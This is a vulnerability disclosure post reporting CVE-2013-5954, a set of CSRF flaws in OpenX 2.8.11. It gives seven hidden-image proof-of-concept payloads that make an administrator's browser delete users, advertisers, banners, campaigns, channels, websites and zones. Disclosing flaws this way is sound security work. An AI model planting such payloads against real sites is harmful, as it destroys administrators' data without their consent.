[CVE-2013-5954] Multiple Cross Site Request Forgery Vulnerabilities in OpenX 2.8.11

[Mahmoud Ghorbanzadeh <mdgh9 () yahoo com>]

Hello,

Multiple
cross-site request forgery (CSRF) vulnerabilities in  OpenX 2.8.11and earlier allows remote attackers to hijack the 
authentication of
administrators for requests that delete (1) users, (2) advertisers, (3) banners,
(4) campaigns, (5) channels, (6) websites or (7) zones via delete actions.

File: admin/agency-user-unlink.php
POC: 

<img src='http://site/admin/agency-user-unlink.php?agencyid=1&userid=18&apos; width="1" height="1" border="0">

File: admin/advertiser-delete.php
POC:
<img src='http://site/admin/advertiser-delete.php?clientid=10&apos; width="1" height="1" border="0">

File: admin/banner-delete.php
POC:
<img
src='http://site/admin/banner-delete.php?clientid=2&campaignid=7&bannerid=16&apos;
width="1" height="1" border="0">

File: admin/campaign-delete.php
POC:
<img src='http://site/admin/campaign-delete.php?clientid=2&campaignid=11&apos; width="1" height="1" border="0">

File: admin/channel-delete.php  
POC:
<img
src='http://site/admin/channel-delete.php?affiliateid=1&channelid=6&apos;
width="1" height="1" border="0">

 
File: admin/affiliate-delete.php
POC:
<img
src='http://site/admin/affiliate-delete.php?affiliateid=9&apos; width="1" height="1"
border="0">

 
File: admin/zone-delete.php
POC:
<img
src='http://site/admin/zone-delete.php?affiliateid=1&zoneid=11&apos;
width="1" height="1" border="0">

Best regards.

Attachment: OpenX CSRF Vulnerabilities Report.docx
Description:

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/